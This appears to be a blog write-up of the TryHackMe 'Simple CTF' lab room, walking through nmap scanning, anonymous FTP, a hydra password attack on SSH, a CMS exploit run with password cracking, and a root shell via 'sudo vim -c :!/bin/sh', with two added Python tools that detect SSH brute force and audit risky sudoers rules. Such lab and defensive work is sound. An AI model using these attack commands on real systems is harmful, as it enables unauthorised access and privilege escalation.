You can find the link here : https://tryhackme.com/room/easyctf

[aksheet@archlinux THM]$ nmap -sV -T4 IP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-04 16:46 UTC
Nmap scan report for IP
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.95 seconds

Foothold Technique 1

Now it is time to enumerate these services. First let us check out the FTP service running on port 21 (I like to enumerate the ports in order).

[aksheet@archlinux THM]$ ftp IP
Connected to IP.
220 (vsFTPd 3.0.3)
Name (IP:aksheet): anonymous <- Enter this as the username
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 .
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 ..
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp>
ftp> cd pub
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 .
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 ..
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp>
ftp> get ForMitch.txt -
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

The note tells us the developer reused a weak password for his system account, so I brute-force the SSH service on port 2222 for the user mitch with hydra:

[aksheet@archlinux ~]$ hydra -l mitch -P rockyou.txt ssh://10.10.142.56:2222
---
[DATA] attacking ssh://10.10.142.56:2222/
[2222][ssh] host: 10.10.142.56 login: mitch password: redacted
1 of 1 target successfully completed, 1 valid password found
---
[aksheet@archlinux ~]$ ssh mitch@IP -p2222 
The authenticity of host '[IP]:2222 ([IP]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[IP]:2222' (ED25519) to the list of known hosts.
mitch@IP's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
$ whoami
mitch
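From the defender's side, the hydra run above leaves a very recognisable trace in /var/log/auth.log: a burst of "Failed password" lines from one source address, followed by an "Accepted password" line for the same user. The following Python is an added example, not part of the original writeup; it parses constructed sshd log lines (the hostname, PIDs and addresses are made up) and flags exactly that pattern.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines (not from the room): a burst of
# password failures from one source followed by an accepted password login,
# which is the trace a dictionary attack such as the hydra run above leaves.
SAMPLE_AUTH_LOG = """\
Aug  4 16:52:01 easyctf sshd[1201]: Failed password for mitch from 10.0.2.15 port 40122 ssh2
Aug  4 16:52:01 easyctf sshd[1203]: Failed password for mitch from 10.0.2.15 port 40124 ssh2
Aug  4 16:52:02 easyctf sshd[1205]: Failed password for invalid user admin from 10.0.2.15 port 40126 ssh2
Aug  4 16:52:02 easyctf sshd[1207]: Failed password for mitch from 10.0.2.15 port 40128 ssh2
Aug  4 16:52:03 easyctf sshd[1209]: Failed password for mitch from 10.0.2.15 port 40130 ssh2
Aug  4 16:52:03 easyctf sshd[1211]: Accepted password for mitch from 10.0.2.15 port 40132 ssh2
Aug  4 16:55:10 easyctf sshd[1300]: Failed password for sunbath from 192.168.0.190 port 50001 ssh2
Aug  4 16:58:00 easyctf sshd[1302]: Accepted publickey for sunbath from 192.168.0.190 port 50003 ssh2
Aug  4 16:58:05 easyctf CRON[1310]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_sshd_line(line):
    """Return a dict for an sshd authentication line, or None for anything else."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; strptime defaults to 1900, which is fine
    # for computing intervals within one log.
    ts = datetime.strptime(re.sub(r"\s+", " ", m.group("ts")), "%b %d %H:%M:%S")
    return {"ts": ts, "result": m.group("result"), "method": m.group("method"),
            "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    """Flag source IPs with >= threshold failed logins inside window_seconds.

    Also records whether a password login from that IP was accepted after
    the burst, the strongest sign that a guessed credential worked.
    """
    events = [e for e in map(parse_sshd_line, log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["result"] == "Failed"]
        # Sliding window over the (already chronological) failures.
        best, start = 0, 0
        for end in range(len(fails)):
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        success_after_burst = any(
            e["result"] == "Accepted" and e["method"] == "password"
            and sum(1 for f in fails if f["ts"] <= e["ts"]) >= threshold
            for e in evs
        )
        alerts.append({
            "ip": ip,
            "max_failures_in_window": best,
            "users_tried": sorted({f["user"] for f in fails}),
            "password_login_after_burst": success_after_burst,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

Run against the sample it reports one alert, for 10.0.2.15, with five failures in the window, two usernames tried and a password login accepted after the burst. The single failure from 192.168.0.190 stays below the threshold, and the public-key login is never counted as a password guess. Tools such as fail2ban implement the same idea with an automatic ban; the cleaner fix for a box like this one is key-only authentication (PasswordAuthentication no in sshd_config), which turns the whole attack class into noise.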

Foothold Technique 2

Now let us enumerate port 80, starting with a directory scan of the web root:

[16:46:09] Starting: 
[16:46:36] 200 - 11KB - /index.html
[16:46:46] 200 - 929B - /robots.txt
[16:50:49] 301 - 315B - /simple -> http://IP/simple/
[Screenshots: the /simple application, its version 2.2.8, and the matching CVE entry]
$ python2 ex.py -u http://IP/simple --crack -w ~/Desktop/rockyou.txt
[+] Salt for password found: Redacted
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: Redacted
[+] Password cracked: Redacted
$ ftp IP
Connected to IP.
220 (vsFTPd 3.0.3)
Name (IP:kali): mitch
530 This FTP server is anonymous only.
Login failed.
$ ssh mitch@IP -p2222
Warning: Permanently added '[IP]:2222' (ECDSA) to the list of known hosts.
mitch@IP's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$
$ pwd
/home/mitch
$ ls
user.txt
$ cat user.txt
Redacted
$ cd /home
$ ls
mitch sunbath

Path To Root

The first thing I check for privilege escalation is the user's sudo rights, which you can list with the sudo -l command.

$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
$ sudo vim -c ':!/bin/sh'
# whoami
root
#
# cd /root
# ls
root.txt
# cat root.txt
Redacted
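The root of this escalation is a sudoers rule, not a bug in vim: any editor or pager run as root with sudo can hand its user a root shell, and even with shell escapes blocked it can still write any file as root. As an added example (my own code, not the room's or the author's), here is a small Python audit that parses sudoers-style rules and flags that pattern, using a constructed sudoers excerpt that places the weak mitch rule beside two hardened ways of granting a root edit of one file. The tag names come from sudoers(5); the usernames, paths and the risky-binary lists are assumptions for the sample.

```python
import os
import re

# Command tags that sudoers(5) allows in front of a command.
SUDO_TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
             "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT"}
# Binaries that give an interactive shell, or can launch one, when run as root.
SHELLS = {"sh", "bash", "dash", "zsh"}
EDITORS_AND_PAGERS = {"vi", "vim", "vim.basic", "nvim", "nano", "less", "more"}

# Constructed sudoers excerpt (not the room's file). The mitch rule is the weak
# one the room demonstrates; 'backup' and 'editor' show two hardened forms.
SAMPLE_SUDOERS = """\
# constructed sample
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
ops     ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
backup  ALL=(root) NOEXEC: /usr/bin/vim /etc/backup.conf
editor  ALL=(root) sudoedit /etc/backup.conf
admin   ALL=(ALL:ALL) ALL
"""

# user  host=(runas) [TAG: ...] command [args], command [args], ...
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<specs>.+)$"
)


def parse_sudoers(text):
    """Split sudoers user-specification lines into one record per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                         "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m.group("specs").split(","):
            tokens = spec.split()
            tags = set()
            # Tags precede the command and each ends in a colon, e.g. NOPASSWD:
            while tokens and tokens[0].endswith(":") and tokens[0][:-1] in SUDO_TAGS:
                tags.add(tokens.pop(0)[:-1])
            if not tokens:
                continue
            rules.append({"user": m.group("who"), "runas": m.group("runas") or "root",
                          "tags": tags, "command": tokens[0], "args": tokens[1:]})
    return rules


def assess(rule):
    """Return (severity, reason) for a risky rule, or None if nothing stands out."""
    cmd = rule["command"]
    base = os.path.basename(cmd)
    if cmd == "ALL":
        return ("high", "unrestricted command list; enumerate what the role actually needs")
    if base in SHELLS:
        return ("high", "grants an interactive root shell")
    if base in EDITORS_AND_PAGERS:
        if "NOEXEC" not in rule["tags"]:
            return ("high", "editor/pager can spawn a root shell from its command line; "
                            "use sudoedit <file> (NOEXEC: only blocks the escape)")
        return ("medium", "NOEXEC blocks shell escapes, but the editor can still open "
                          "any file as root; prefer sudoedit <file>")
    if "NOPASSWD" in rule["tags"]:
        return ("low", "no password prompt; confirm the command cannot be made to run other programs")
    return None


def audit_sudoers(text):
    """Run assess() over every parsed rule and collect the findings in file order."""
    findings = []
    for rule in parse_sudoers(text):
        result = assess(rule)
        if result:
            severity, reason = result
            findings.append({"user": rule["user"],
                             "command": " ".join([rule["command"]] + rule["args"]),
                             "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']:6}] {f['user']}: {f['command']} -- {f['reason']}")
```

On the sample the mitch rule and the catch-all admin rule come out high, the NOEXEC variant medium, the systemctl rule low, and the sudoedit rule is not reported at all, which is the point: sudoedit copies the file to a temporary location, opens it with the user's own editor under the user's own privileges, and only the final write-back happens as root, so neither a shell escape nor an arbitrary :e lands anywhere useful.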

Hi, I’m Aksheet. Interested in Cyber Security and Aviation. eJPT certified on 9th March 2021.